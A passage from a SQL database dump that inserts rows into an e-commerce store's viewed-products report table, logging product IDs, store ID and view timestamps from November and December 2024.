(14505, NULL, NULL, 2062, 1, '2024-11-09 12:19:09'),
(14506, NULL, NULL, 2054, 1, '2024-11-09 13:16:02'),
(14507, NULL, NULL, 2059, 1, '2024-11-09 13:26:57'),
(14508, NULL, NULL, 2064, 1, '2024-11-09 13:36:02'),
(14509, NULL, NULL, 2064, 1, '2024-11-09 22:03:54'),
(14510, NULL, NULL, 2054, 1, '2024-11-10 05:03:36'),
(14511, NULL, NULL, 2064, 1, '2024-11-10 16:51:11'),
(14512, NULL, NULL, 2059, 1, '2024-11-10 18:09:32'),
(14513, NULL, NULL, 2062, 1, '2024-11-10 21:47:02'),
(14514, NULL, NULL, 2058, 1, '2024-11-10 21:47:05'),
(14515, NULL, NULL, 2064, 1, '2024-11-10 21:47:10'),
(14516, NULL, NULL, 2060, 1, '2024-11-10 23:39:41'),
(14517, NULL, NULL, 2064, 1, '2024-11-11 02:36:25'),
(14518, NULL, NULL, 2054, 1, '2024-11-11 03:13:43'),
(14519, NULL, NULL, 2064, 1, '2024-11-11 03:42:12'),
(14520, NULL, NULL, 2062, 1, '2024-11-11 04:07:10'),
(14521, NULL, NULL, 2060, 1, '2024-11-11 05:27:37'),
(14522, NULL, NULL, 2059, 1, '2024-11-11 08:59:09'),
(14523, NULL, NULL, 2060, 1, '2024-11-11 15:40:16'),
(14524, NULL, NULL, 2060, 1, '2024-11-11 16:42:39'),
(14525, NULL, NULL, 2064, 1, '2024-11-11 16:46:09'),
(14526, NULL, NULL, 2054, 1, '2024-11-11 21:05:57'),
(14527, NULL, NULL, 2061, 1, '2024-11-12 08:36:34'),
(14528, NULL, NULL, 2054, 1, '2024-11-12 10:18:39'),
(14529, NULL, NULL, 2064, 1, '2024-11-12 15:19:30'),
(14530, NULL, NULL, 2061, 1, '2024-11-12 16:44:14'),
(14531, NULL, NULL, 2062, 1, '2024-11-12 20:23:04'),
(14532, NULL, NULL, 2058, 1, '2024-11-13 00:06:52'),
(14533, NULL, NULL, 2054, 1, '2024-11-13 00:23:58'),
(14534, NULL, NULL, 2063, 1, '2024-11-13 01:56:27'),
(14535, NULL, NULL, 2059, 1, '2024-11-13 01:57:28'),
(14536, NULL, NULL, 2061, 1, '2024-11-13 02:00:58'),
(14537, NULL, NULL, 2055, 1, '2024-11-13 02:37:32'),
(14538, NULL, NULL, 2064, 1, '2024-11-13 06:19:04'),
(14539, NULL, NULL, 2054, 1, '2024-11-13 12:16:05'),
(14540, NULL, NULL, 2063, 1, '2024-11-13 14:17:38');
INSERT INTO `report_viewed_product_index` (`index_id`, `visitor_id`, `customer_id`, `product_id`, `store_id`, `added_at`) VALUES
(14541, NULL, NULL, 2063, 1, '2024-11-13 14:47:48'),
(14542, NULL, NULL, 2062, 1, '2024-11-13 14:52:11'),
(14543, NULL, NULL, 2058, 1, '2024-11-13 14:54:51'),
(14544, NULL, NULL, 2064, 1, '2024-11-13 16:21:54'),
(14545, 2777, NULL, 2062, 1, '2024-11-13 16:22:08'),
(14546, 2777, NULL, 2055, 1, '2024-11-13 16:22:10'),
(14547, 2777, NULL, 2064, 1, '2024-11-13 16:22:12'),
(14548, 2777, NULL, 2058, 1, '2024-11-13 16:22:14'),
(14549, 2777, NULL, 2059, 1, '2024-11-13 16:22:21'),
(14553, 2777, NULL, 2054, 1, '2024-11-13 16:22:41'),
(14554, 2777, NULL, 2060, 1, '2024-11-13 16:22:43'),
(14555, 2777, NULL, 2061, 1, '2024-11-13 16:22:47'),
(14556, NULL, NULL, 2063, 1, '2024-11-13 22:25:27'),
(14557, NULL, NULL, 2054, 1, '2024-11-13 22:53:42'),
(14558, NULL, NULL, 2064, 1, '2024-11-14 00:20:55'),
(14559, NULL, NULL, 2053, 1, '2024-11-14 02:13:18'),
(14560, NULL, NULL, 2063, 1, '2024-11-14 07:03:27'),
(14561, NULL, NULL, 2058, 1, '2024-11-14 08:23:26'),
(14562, NULL, NULL, 2060, 1, '2024-11-14 09:57:00'),
(14563, NULL, NULL, 2063, 1, '2024-11-14 10:43:01'),
(14564, NULL, NULL, 2054, 1, '2024-11-14 12:02:36'),
(14565, NULL, NULL, 2055, 1, '2024-11-14 12:02:39'),
(14566, NULL, NULL, 2062, 1, '2024-11-14 12:02:40'),
(14567, NULL, NULL, 2059, 1, '2024-11-14 12:02:42'),
(14568, NULL, NULL, 2064, 1, '2024-11-14 12:02:43'),
(14569, NULL, NULL, 2063, 1, '2024-11-14 12:02:44'),
(14570, NULL, NULL, 2061, 1, '2024-11-14 12:02:45'),
(14571, NULL, NULL, 2060, 1, '2024-11-14 12:02:47'),
(14572, NULL, NULL, 2058, 1, '2024-11-14 12:02:51'),
(14573, NULL, NULL, 2054, 1, '2024-11-14 13:05:59'),
(14574, NULL, NULL, 2054, 1, '2024-11-14 13:28:13'),
(14575, NULL, NULL, 2054, 1, '2024-11-14 17:28:39'),
(14576, NULL, NULL, 2062, 1, '2024-11-15 02:27:00'),
(14577, NULL, NULL, 2063, 1, '2024-11-15 03:59:25'),
(14578, NULL, NULL, 2059, 1, '2024-11-15 04:00:15'),
(14579, NULL, NULL, 2061, 1, '2024-11-15 04:01:02'),
(14580, NULL, NULL, 2058, 1, '2024-11-15 04:04:24'),
(14581, NULL, NULL, 2062, 1, '2024-11-15 04:04:28'),
(14582, NULL, NULL, 2058, 1, '2024-11-15 08:56:54'),
(14583, NULL, NULL, 2064, 1, '2024-11-15 08:57:10'),
(14584, NULL, NULL, 2062, 1, '2024-11-15 08:57:28'),
(14585, NULL, NULL, 2055, 1, '2024-11-15 08:57:34'),
(14586, NULL, NULL, 2054, 1, '2024-11-15 08:57:40'),
(14587, NULL, NULL, 2059, 1, '2024-11-15 08:58:02'),
(14588, NULL, NULL, 2063, 1, '2024-11-15 08:58:05'),
(14589, NULL, NULL, 2061, 1, '2024-11-15 08:58:09'),
(14590, NULL, NULL, 2060, 1, '2024-11-15 08:58:16'),
(14591, NULL, NULL, 2058, 1, '2024-11-15 08:58:39'),
(14592, NULL, NULL, 2064, 1, '2024-11-15 08:58:49'),
(14593, NULL, NULL, 2062, 1, '2024-11-15 08:59:09'),
(14594, NULL, NULL, 2055, 1, '2024-11-15 08:59:12'),
(14595, NULL, NULL, 2059, 1, '2024-11-15 08:59:22'),
(14596, NULL, NULL, 2063, 1, '2024-11-15 08:59:27'),
(14597, NULL, NULL, 2061, 1, '2024-11-15 08:59:31'),
(14598, NULL, NULL, 2054, 1, '2024-11-15 08:59:34'),
(14599, NULL, NULL, 2060, 1, '2024-11-15 08:59:40'),
(14600, NULL, NULL, 2053, 1, '2024-11-15 09:00:05'),
(14601, NULL, NULL, 2061, 1, '2024-11-15 09:08:59'),
(14602, NULL, NULL, 2054, 1, '2024-11-15 09:17:13'),
(14603, NULL, NULL, 2061, 1, '2024-11-15 10:17:17'),
(14604, NULL, NULL, 2064, 1, '2024-11-15 13:50:41'),
(14605, NULL, NULL, 2063, 1, '2024-11-15 14:22:55'),
(14606, NULL, NULL, 2061, 1, '2024-11-15 17:58:38'),
(14607, NULL, NULL, 2064, 1, '2024-11-15 22:56:16'),
(14608, NULL, NULL, 2062, 1, '2024-11-16 02:27:01'),
(14609, NULL, NULL, 2064, 1, '2024-11-16 11:10:33'),
(14610, NULL, NULL, 2054, 1, '2024-11-16 14:57:06'),
(14611, NULL, NULL, 2055, 1, '2024-11-16 21:13:14'),
(14612, NULL, NULL, 2064, 1, '2024-11-16 21:42:22'),
(14613, NULL, NULL, 2058, 1, '2024-11-16 23:12:26'),
(14614, NULL, NULL, 2054, 1, '2024-11-17 06:36:41'),
(14615, NULL, NULL, 2059, 1, '2024-11-17 10:28:02'),
(14616, NULL, NULL, 2059, 1, '2024-11-17 12:42:41'),
(14617, NULL, NULL, 2063, 1, '2024-11-17 13:21:24'),
(14618, NULL, NULL, 2061, 1, '2024-11-17 13:31:47'),
(14619, NULL, NULL, 2058, 1, '2024-11-17 13:47:17'),
(14620, NULL, NULL, 2062, 1, '2024-11-17 13:58:48'),
(14621, NULL, NULL, 2061, 1, '2024-11-17 14:38:02'),
(14622, NULL, NULL, 2058, 1, '2024-11-17 16:21:28'),
(14623, NULL, NULL, 2062, 1, '2024-11-17 16:30:27'),
(14624, NULL, NULL, 2064, 1, '2024-11-17 16:35:58'),
(14625, NULL, NULL, 2054, 1, '2024-11-17 16:43:38'),
(14626, NULL, NULL, 2059, 1, '2024-11-17 18:29:39'),
(14627, NULL, NULL, 2061, 1, '2024-11-17 20:30:21'),
(14628, NULL, NULL, 2061, 1, '2024-11-17 22:44:34'),
(14629, NULL, NULL, 2062, 1, '2024-11-18 01:02:47'),
(14630, NULL, NULL, 2059, 1, '2024-11-18 02:31:17'),
(14631, NULL, NULL, 2064, 1, '2024-11-18 04:32:11'),
(14632, NULL, NULL, 2061, 1, '2024-11-18 05:59:35'),
(14633, NULL, NULL, 2059, 1, '2024-11-18 06:28:32'),
(14634, NULL, NULL, 2062, 1, '2024-11-18 06:30:20'),
(14635, NULL, NULL, 2059, 1, '2024-11-18 14:07:46'),
(14636, NULL, NULL, 2061, 1, '2024-11-18 14:45:32'),
(14637, NULL, NULL, 2064, 1, '2024-11-18 15:08:36'),
(14638, NULL, NULL, 2060, 1, '2024-11-18 17:28:56'),
(14639, NULL, NULL, 2054, 1, '2024-11-18 18:21:08'),
(14640, NULL, NULL, 2054, 1, '2024-11-19 09:30:25'),
(14641, NULL, NULL, 2059, 1, '2024-11-19 10:13:44'),
(14642, NULL, NULL, 2064, 1, '2024-11-20 01:07:50'),
(14643, NULL, NULL, 2053, 1, '2024-11-20 06:21:12'),
(14644, NULL, NULL, 2054, 1, '2024-11-20 09:46:15'),
(14645, NULL, NULL, 2054, 1, '2024-11-20 12:30:19'),
(14646, NULL, NULL, 2058, 1, '2024-11-20 13:14:35'),
(14647, NULL, NULL, 2058, 1, '2024-11-21 00:17:39'),
(14648, NULL, NULL, 2063, 1, '2024-11-21 02:06:35'),
(14649, NULL, NULL, 2060, 1, '2024-11-21 07:25:51'),
(14650, NULL, NULL, 2063, 1, '2024-11-21 07:41:36'),
(14651, NULL, NULL, 2058, 1, '2024-11-21 08:24:16'),
(14652, NULL, NULL, 2055, 1, '2024-11-21 10:01:16'),
(14653, NULL, NULL, 2061, 1, '2024-11-21 12:48:23'),
(14654, NULL, NULL, 2062, 1, '2024-11-21 13:58:46'),
(14655, NULL, NULL, 2054, 1, '2024-11-21 16:01:46'),
(14656, NULL, NULL, 2059, 1, '2024-11-21 16:27:28'),
(14657, NULL, NULL, 2064, 1, '2024-11-21 16:49:32'),
(14658, NULL, NULL, 2064, 1, '2024-11-21 19:21:56'),
(14659, NULL, NULL, 2064, 1, '2024-11-21 23:11:31'),
(14660, NULL, NULL, 2062, 1, '2024-11-22 02:16:07'),
(14661, NULL, NULL, 2063, 1, '2024-11-22 07:16:19'),
(14662, NULL, NULL, 2063, 1, '2024-11-22 07:24:07'),
(14663, NULL, NULL, 2054, 1, '2024-11-22 07:42:34'),
(14664, NULL, NULL, 2055, 1, '2024-11-22 08:02:43'),
(14665, NULL, NULL, 2062, 1, '2024-11-22 09:44:18'),
(14666, NULL, NULL, 2058, 1, '2024-11-22 11:09:59'),
(14667, NULL, NULL, 2054, 1, '2024-11-22 11:15:35'),
(14668, NULL, NULL, 2059, 1, '2024-11-22 14:42:22'),
(14669, NULL, NULL, 2063, 1, '2024-11-22 14:43:58'),
(14670, NULL, NULL, 2054, 1, '2024-11-22 14:46:50'),
(14671, NULL, NULL, 2062, 1, '2024-11-22 14:48:42'),
(14672, NULL, NULL, 2061, 1, '2024-11-22 14:51:35'),
(14673, NULL, NULL, 2058, 1, '2024-11-22 14:53:16'),
(14674, NULL, NULL, 2055, 1, '2024-11-22 15:05:16'),
(14675, NULL, NULL, 2064, 1, '2024-11-22 15:22:56'),
(14676, NULL, NULL, 2060, 1, '2024-11-22 15:23:46'),
(14677, NULL, NULL, 2063, 1, '2024-11-22 21:23:23'),
(14678, NULL, NULL, 2061, 1, '2024-11-22 22:44:46'),
(14679, NULL, NULL, 2061, 1, '2024-11-22 22:44:47'),
(14680, NULL, NULL, 2054, 1, '2024-11-22 23:08:30'),
(14681, NULL, NULL, 2054, 1, '2024-11-23 03:05:28'),
(14682, NULL, NULL, 2063, 1, '2024-11-23 03:36:56'),
(14683, NULL, NULL, 2055, 1, '2024-11-23 03:52:09'),
(14684, NULL, NULL, 2062, 1, '2024-11-23 04:35:19'),
(14685, NULL, NULL, 2062, 1, '2024-11-23 06:00:44'),
(14686, NULL, NULL, 2060, 1, '2024-11-23 07:00:23'),
(14687, NULL, NULL, 2054, 1, '2024-11-23 09:08:10'),
(14688, NULL, NULL, 2062, 1, '2024-11-23 09:34:33'),
(14689, NULL, NULL, 2060, 1, '2024-11-23 13:45:30'),
(14690, NULL, NULL, 2058, 1, '2024-11-23 19:21:30'),
(14691, NULL, NULL, 2058, 1, '2024-11-23 19:39:37'),
(14692, NULL, NULL, 2059, 1, '2024-11-23 20:41:50'),
(14693, NULL, NULL, 2059, 1, '2024-11-23 21:05:42'),
(14694, NULL, NULL, 2055, 1, '2024-11-23 21:34:06'),
(14695, NULL, NULL, 2062, 1, '2024-11-23 23:06:01'),
(14696, NULL, NULL, 2061, 1, '2024-11-23 23:10:27'),
(14697, NULL, NULL, 2063, 1, '2024-11-23 23:14:27'),
(14698, NULL, NULL, 2064, 1, '2024-11-23 23:45:31'),
(14699, NULL, NULL, 2061, 1, '2024-11-24 03:07:40'),
(14700, NULL, NULL, 2053, 1, '2024-11-24 03:24:58'),
(14701, NULL, NULL, 2064, 1, '2024-11-24 03:57:05'),
(14702, NULL, NULL, 2059, 1, '2024-11-24 13:05:35'),
(14703, NULL, NULL, 2064, 1, '2024-11-24 15:44:49'),
(14704, NULL, NULL, 2058, 1, '2024-11-24 16:01:35'),
(14705, NULL, NULL, 2062, 1, '2024-11-24 19:31:43'),
(14706, NULL, NULL, 2059, 1, '2024-11-24 21:59:40'),
(14707, NULL, NULL, 2054, 1, '2024-11-24 23:17:40'),
(14708, NULL, NULL, 2055, 1, '2024-11-25 01:01:46'),
(14709, NULL, NULL, 2054, 1, '2024-11-25 01:33:40'),
(14710, NULL, NULL, 2053, 1, '2024-11-25 08:47:27'),
(14711, NULL, NULL, 2064, 1, '2024-11-25 09:32:48'),
(14712, NULL, NULL, 2063, 1, '2024-11-25 10:19:46'),
(14713, NULL, NULL, 2061, 1, '2024-11-25 11:00:56'),
(14714, NULL, NULL, 2055, 1, '2024-11-25 20:25:10'),
(14715, NULL, NULL, 2058, 1, '2024-11-26 01:05:11'),
(14716, NULL, NULL, 2054, 1, '2024-11-26 05:25:08'),
(14717, NULL, NULL, 2062, 1, '2024-11-26 06:10:04'),
(14718, NULL, NULL, 2054, 1, '2024-11-26 17:50:35'),
(14719, NULL, NULL, 2055, 1, '2024-11-26 18:04:25'),
(14720, NULL, NULL, 2062, 1, '2024-11-26 23:37:50'),
(14721, NULL, NULL, 2054, 1, '2024-11-27 00:49:12'),
(14722, NULL, NULL, 2054, 1, '2024-11-27 18:42:02'),
(14723, NULL, NULL, 2055, 1, '2024-11-27 23:59:39'),
(14724, NULL, NULL, 2053, 1, '2024-11-28 02:56:18'),
(14725, NULL, NULL, 2059, 1, '2024-11-28 07:12:28'),
(14726, NULL, NULL, 2059, 1, '2024-11-28 12:22:29'),
(14727, NULL, NULL, 2053, 1, '2024-11-28 14:30:59'),
(14728, NULL, NULL, 2059, 1, '2024-11-28 14:51:25'),
(14729, NULL, NULL, 2061, 1, '2024-11-28 18:04:56'),
(14730, NULL, NULL, 2060, 1, '2024-11-28 18:07:22'),
(14731, NULL, NULL, 2064, 1, '2024-11-28 18:07:42'),
(14732, NULL, NULL, 2064, 1, '2024-11-28 21:32:28'),
(14733, NULL, NULL, 2061, 1, '2024-11-28 23:47:55'),
(14734, NULL, NULL, 2062, 1, '2024-11-29 00:24:59'),
(14735, NULL, NULL, 2053, 1, '2024-11-29 01:45:01'),
(14736, NULL, NULL, 2063, 1, '2024-11-29 02:18:00'),
(14737, NULL, NULL, 2064, 1, '2024-11-29 05:25:06'),
(14738, NULL, NULL, 2060, 1, '2024-11-29 11:40:07'),
(14739, NULL, NULL, 2064, 1, '2024-11-29 17:58:24'),
(14740, NULL, NULL, 2064, 1, '2024-11-29 20:53:24'),
(14741, NULL, NULL, 2054, 1, '2024-11-29 21:46:39'),
(14742, NULL, NULL, 2060, 1, '2024-11-30 02:54:42'),
(14743, NULL, NULL, 2063, 1, '2024-11-30 02:54:45'),
(14744, NULL, NULL, 2058, 1, '2024-11-30 02:54:48'),
(14745, NULL, NULL, 2055, 1, '2024-11-30 02:54:52'),
(14746, NULL, NULL, 2061, 1, '2024-11-30 02:54:58'),
(14747, NULL, NULL, 2062, 1, '2024-11-30 02:55:03'),
(14748, NULL, NULL, 2054, 1, '2024-11-30 02:57:51'),
(14749, NULL, NULL, 2059, 1, '2024-11-30 02:58:31'),
(14750, NULL, NULL, 2064, 1, '2024-11-30 02:58:58'),
(14751, NULL, NULL, 2060, 1, '2024-11-30 05:56:18'),
(14752, NULL, NULL, 2063, 1, '2024-11-30 05:56:22'),
(14753, NULL, NULL, 2058, 1, '2024-11-30 05:56:24'),
(14754, NULL, NULL, 2055, 1, '2024-11-30 05:56:27'),
(14755, NULL, NULL, 2061, 1, '2024-11-30 05:56:34'),
(14756, NULL, NULL, 2062, 1, '2024-11-30 05:56:38'),
(14757, NULL, NULL, 2054, 1, '2024-11-30 05:58:50'),
(14758, NULL, NULL, 2059, 1, '2024-11-30 05:59:26'),
(14759, NULL, NULL, 2064, 1, '2024-11-30 05:59:56'),
(14760, NULL, NULL, 2059, 1, '2024-11-30 12:23:05'),
(14761, NULL, NULL, 2054, 1, '2024-11-30 17:22:47'),
(14762, NULL, NULL, 2062, 1, '2024-11-30 20:16:46'),
(14763, NULL, NULL, 2058, 1, '2024-11-30 21:32:32'),
(14764, NULL, NULL, 2061, 1, '2024-11-30 22:31:30'),
(14765, NULL, NULL, 2054, 1, '2024-12-01 02:06:40'),
(14766, NULL, NULL, 2062, 1, '2024-12-01 06:25:26'),
(14767, NULL, NULL, 2063, 1, '2024-12-01 08:08:09'),
(14768, NULL, NULL, 2063, 1, '2024-12-01 13:55:53'),
(14769, NULL, NULL, 2062, 1, '2024-12-01 20:30:14'),
(14770, NULL, NULL, 2063, 1, '2024-12-02 03:02:02'),
(14771, NULL, NULL, 2062, 1, '2024-12-02 03:02:13'),
(14772, NULL, NULL, 2060, 1, '2024-12-02 03:02:23'),
(14773, NULL, NULL, 2059, 1, '2024-12-02 03:02:40'),
(14774, NULL, NULL, 2053, 1, '2024-12-02 05:41:13'),
(14775, NULL, NULL, 2059, 1, '2024-12-02 12:57:47'),
(14776, NULL, NULL, 2059, 1, '2024-12-02 13:03:11'),
(14777, NULL, NULL, 2062, 1, '2024-12-02 17:01:18'),
(14778, NULL, NULL, 2061, 1, '2024-12-02 19:34:20'),
(14779, NULL, NULL, 2061, 1, '2024-12-02 20:57:36'),
(14780, NULL, NULL, 2058, 1, '2024-12-02 21:06:52'),
(14781, NULL, NULL, 2061, 1, '2024-12-02 22:06:14'),
(14782, NULL, NULL, 2064, 1, '2024-12-02 22:08:01'),
(14783, NULL, NULL, 2062, 1, '2024-12-02 23:13:02'),
(14784, NULL, NULL, 2054, 1, '2024-12-03 04:37:27'),
(14785, NULL, NULL, 2061, 1, '2024-12-03 04:54:29'),
(14786, NULL, NULL, 2060, 1, '2024-12-03 06:30:32'),
(14787, NULL, NULL, 2054, 1, '2024-12-03 07:22:23'),
(14788, NULL, NULL, 2054, 1, '2024-12-03 20:14:30'),
(14789, NULL, NULL, 2059, 1, '2024-12-04 05:05:15'),
(14790, NULL, NULL, 2059, 1, '2024-12-04 05:05:17'),
(14791, NULL, NULL, 2059, 1, '2024-12-04 07:39:05'),
(14792, NULL, NULL, 2059, 1, '2024-12-04 09:29:25'),
(14793, NULL, NULL, 2059, 1, '2024-12-04 11:40:58'),
(14794, NULL, NULL, 2060, 1, '2024-12-04 18:11:35'),
(14795, NULL, NULL, 2059, 1, '2024-12-04 18:55:12'),
(14796, NULL, NULL, 2064, 1, '2024-12-04 19:06:08'),
(14797, NULL, NULL, 2058, 1, '2024-12-04 22:35:39'),
(14798, NULL, NULL, 2058, 1, '2024-12-05 05:02:55'),
(14799, NULL, NULL, 2064, 1, '2024-12-05 05:02:55'),
(14800, NULL, NULL, 2064, 1, '2024-12-05 05:02:55'),
(14801, NULL, NULL, 2055, 1, '2024-12-05 05:02:55'),
(14802, NULL, NULL, 2064, 1, '2024-12-05 05:02:55'),
(14803, NULL, NULL, 2053, 1, '2024-12-05 05:02:55'),
(14804, NULL, NULL, 2061, 1, '2024-12-05 05:03:14'),
(14805, NULL, NULL, 2059, 1, '2024-12-05 05:03:32'),
(14806, NULL, NULL, 2054, 1, '2024-12-05 05:03:34'),
(14807, NULL, NULL, 2060, 1, '2024-12-05 05:03:35'),
(14808, NULL, NULL, 2053, 1, '2024-12-05 05:03:36'),
(14809, NULL, NULL, 2062, 1, '2024-12-05 05:03:37'),
(14810, NULL, NULL, 2063, 1, '2024-12-05 05:03:38'),
(14811, NULL, NULL, 2064, 1, '2024-12-05 06:24:34'),
(14812, NULL, NULL, 2061, 1, '2024-12-05 06:25:07'),
(14813, NULL, NULL, 2055, 1, '2024-12-05 06:25:22'),
(14814, NULL, NULL, 2062, 1, '2024-12-05 06:27:55'),
(14815, NULL, NULL, 2059, 1, '2024-12-05 06:28:09'),
(14816, NULL, NULL, 2054, 1, '2024-12-05 06:29:38'),
(14817, NULL, NULL, 2055, 1, '2024-12-05 06:33:38'),
(14818, NULL, NULL, 2061, 1, '2024-12-05 06:36:38'),
(14819, NULL, NULL, 2054, 1, '2024-12-05 06:38:01'),
(14820, NULL, NULL, 2058, 1, '2024-12-05 06:47:17'),
(14821, NULL, NULL, 2060, 1, '2024-12-05 07:46:51'),
(14822, NULL, NULL, 2055, 1, '2024-12-05 07:59:38'),
(14823, NULL, NULL, 2064, 1, '2024-12-05 07:59:39'),
(14824, NULL, NULL, 2064, 1, '2024-12-05 07:59:40'),
(14825, NULL, NULL, 2058, 1, '2024-12-05 07:59:42'),
(14826, NULL, NULL, 2064, 1, '2024-12-05 07:59:42'),
(14827, NULL, NULL, 2053, 1, '2024-12-05 07:59:43'),
(14828, NULL, NULL, 2061, 1, '2024-12-05 07:59:56'),
(14829, NULL, NULL, 2060, 1, '2024-12-05 08:00:52'),
(14830, NULL, NULL, 2054, 1, '2024-12-05 08:00:53'),
(14831, NULL, NULL, 2059, 1, '2024-12-05 08:00:54'),
(14832, NULL, NULL, 2062, 1, '2024-12-05 08:00:55'),
(14833, NULL, NULL, 2053, 1, '2024-12-05 08:00:56'),
(14834, NULL, NULL, 2063, 1, '2024-12-05 08:00:58'),
(14835, NULL, NULL, 2062, 1, '2024-12-05 08:17:41'),
(14836, NULL, NULL, 2058, 1, '2024-12-05 08:22:09'),
(14837, NULL, NULL, 2058, 1, '2024-12-05 08:39:32'),
(14838, NULL, NULL, 2060, 1, '2024-12-05 08:54:59'),
(14839, NULL, NULL, 2053, 1, '2024-12-05 09:14:54'),
(14840, NULL, NULL, 2064, 1, '2024-12-05 09:47:22'),
(14841, NULL, NULL, 2058, 1, '2024-12-05 11:54:50'),
(14842, NULL, NULL, 2059, 1, '2024-12-05 14:03:52'),
(14843, NULL, NULL, 2054, 1, '2024-12-05 18:09:44'),
(14844, NULL, NULL, 2064, 1, '2024-12-05 19:55:59'),
(14845, NULL, NULL, 2054, 1, '2024-12-05 22:19:18'),
(14846, NULL, NULL, 2058, 1, '2024-12-05 23:06:54'),
(14847, NULL, NULL, 2059, 1, '2024-12-06 02:14:08'),
(14848, NULL, NULL, 2054, 1, '2024-12-06 06:04:17'),
(14849, NULL, NULL, 2054, 1, '2024-12-06 11:45:12'),
(14850, NULL, NULL, 2055, 1, '2024-12-06 11:45:15'),
(14851, NULL, NULL, 2058, 1, '2024-12-06 11:45:22'),
(14852, NULL, NULL, 2061, 1, '2024-12-06 11:45:25'),
(14853, NULL, NULL, 2060, 1, '2024-12-06 11:45:29'),
(14854, NULL, NULL, 2059, 1, '2024-12-06 11:45:32'),
(14855, NULL, NULL, 2063, 1, '2024-12-06 11:45:35'),
(14856, NULL, NULL, 2062, 1, '2024-12-06 11:45:45'),
(14857, NULL, NULL, 2064, 1, '2024-12-06 11:45:48'),
(14858, NULL, NULL, 2053, 1, '2024-12-06 11:46:54'),
(14859, NULL, NULL, 2060, 1, '2024-12-06 19:54:21'),
(14860, NULL, NULL, 2063, 1, '2024-12-06 20:02:46'),
(14861, NULL, NULL, 2064, 1, '2024-12-06 20:06:25'),
(14862, NULL, NULL, 2060, 1, '2024-12-06 20:44:20'),
(14863, NULL, NULL, 2063, 1, '2024-12-06 20:52:08'),
(14864, NULL, NULL, 2058, 1, '2024-12-06 21:11:18'),
(14865, NULL, NULL, 2055, 1, '2024-12-06 21:49:13'),
(14866, NULL, NULL, 2060, 1, '2024-12-06 22:12:21'),
(14867, NULL, NULL, 2063, 1, '2024-12-06 22:20:11'),
(14868, NULL, NULL, 2058, 1, '2024-12-06 22:39:48'),
(14869, NULL, NULL, 2055, 1, '2024-12-06 23:16:24'),
(14870, NULL, NULL, 2061, 1, '2024-12-07 00:26:21'),
(14871, NULL, NULL, 2062, 1, '2024-12-07 01:05:46'),
(14872, NULL, NULL, 2054, 1, '2024-12-07 02:13:54'),
(14873, NULL, NULL, 2059, 1, '2024-12-07 02:27:59'),
(14874, NULL, NULL, 2064, 1, '2024-12-07 02:40:35'),
(14875, NULL, NULL, 2060, 1, '2024-12-07 06:50:48'),
(14876, NULL, NULL, 2063, 1, '2024-12-07 06:59:00'),
(14877, NULL, NULL, 2054, 1, '2024-12-07 07:03:03'),
(14878, NULL, NULL, 2058, 1, '2024-12-07 07:19:01'),
(14879, NULL, NULL, 2055, 1, '2024-12-07 07:56:51'),
(14880, NULL, NULL, 2061, 1, '2024-12-07 09:06:36'),
(14881, NULL, NULL, 2055, 1, '2024-12-07 09:38:43'),
(14882, NULL, NULL, 2058, 1, '2024-12-07 09:38:45'),
(14883, NULL, NULL, 2062, 1, '2024-12-07 09:45:15'),
(14884, NULL, NULL, 2054, 1, '2024-12-07 10:51:44'),
(14885, NULL, NULL, 2059, 1, '2024-12-07 11:05:50'),
(14886, NULL, NULL, 2064, 1, '2024-12-07 11:18:22'),
(14887, NULL, NULL, 2060, 1, '2024-12-07 12:15:39'),
(14888, NULL, NULL, 2063, 1, '2024-12-07 12:23:52'),
(14889, NULL, NULL, 2058, 1, '2024-12-07 12:43:43'),
(14890, NULL, NULL, 2055, 1, '2024-12-07 13:21:46'),
(14891, NULL, NULL, 2061, 1, '2024-12-07 14:30:20'),
(14892, NULL, NULL, 2062, 1, '2024-12-07 15:09:13'),
(14893, NULL, NULL, 2060, 1, '2024-12-07 16:18:13'),
(14894, NULL, NULL, 2063, 1, '2024-12-07 16:26:34'),
(14895, NULL, NULL, 2058, 1, '2024-12-07 16:47:04'),
(14896, NULL, NULL, 2055, 1, '2024-12-07 17:26:21'),
(14897, NULL, NULL, 2064, 1, '2024-12-07 17:37:21'),
(14898, NULL, NULL, 2061, 1, '2024-12-07 18:38:41'),
(14899, NULL, NULL, 2062, 1, '2024-12-07 19:18:46'),
(14900, NULL, NULL, 2054, 1, '2024-12-07 20:29:29'),
(14901, NULL, NULL, 2059, 1, '2024-12-07 20:44:15'),
(14902, NULL, NULL, 2064, 1, '2024-12-07 20:57:31'),
(14903, NULL, NULL, 2060, 1, '2024-12-07 21:40:23'),
(14904, NULL, NULL, 2063, 1, '2024-12-07 21:48:39'),
(14905, NULL, NULL, 2058, 1, '2024-12-07 22:08:53'),
(14906, NULL, NULL, 2055, 1, '2024-12-07 22:46:42'),
(14907, NULL, NULL, 2060, 1, '2024-12-07 23:13:18'),
(14908, NULL, NULL, 2063, 1, '2024-12-07 23:22:11'),
(14909, NULL, NULL, 2058, 1, '2024-12-07 23:43:41'),
(14910, NULL, NULL, 2055, 1, '2024-12-08 00:24:26'),
(14911, NULL, NULL, 2060, 1, '2024-12-08 00:58:48'),
(14912, NULL, NULL, 2063, 1, '2024-12-08 01:06:49'),
(14913, NULL, NULL, 2058, 1, '2024-12-08 01:26:28'),
(14914, NULL, NULL, 2055, 1, '2024-12-08 02:03:59'),
(14915, NULL, NULL, 2061, 1, '2024-12-08 03:15:02'),
(14916, NULL, NULL, 2059, 1, '2024-12-08 03:41:45'),
(14917, NULL, NULL, 2062, 1, '2024-12-08 03:54:30'),
(14918, NULL, NULL, 2054, 1, '2024-12-08 04:44:19'),
(14919, NULL, NULL, 2054, 1, '2024-12-08 05:01:52'),
(14920, NULL, NULL, 2059, 1, '2024-12-08 05:15:56'),
(14921, NULL, NULL, 2064, 1, '2024-12-08 05:28:33'),
(14922, NULL, NULL, 2060, 1, '2024-12-08 06:54:38'),
(14923, NULL, NULL, 2063, 1, '2024-12-08 07:03:40'),
(14924, NULL, NULL, 2060, 1, '2024-12-08 07:42:40'),
(14925, NULL, NULL, 2063, 1, '2024-12-08 07:50:27'),
(14926, NULL, NULL, 2058, 1, '2024-12-08 08:09:48'),
(14927, NULL, NULL, 2055, 1, '2024-12-08 08:47:28'),
(14928, NULL, NULL, 2061, 1, '2024-12-08 09:56:46'),
(14929, NULL, NULL, 2062, 1, '2024-12-08 10:34:49'),
(14930, NULL, NULL, 2054, 1, '2024-12-08 11:41:58'),
(14931, NULL, NULL, 2059, 1, '2024-12-08 11:55:51'),
(14932, NULL, NULL, 2064, 1, '2024-12-08 12:08:19'),
(14933, NULL, NULL, 2063, 1, '2024-12-08 14:45:51'),
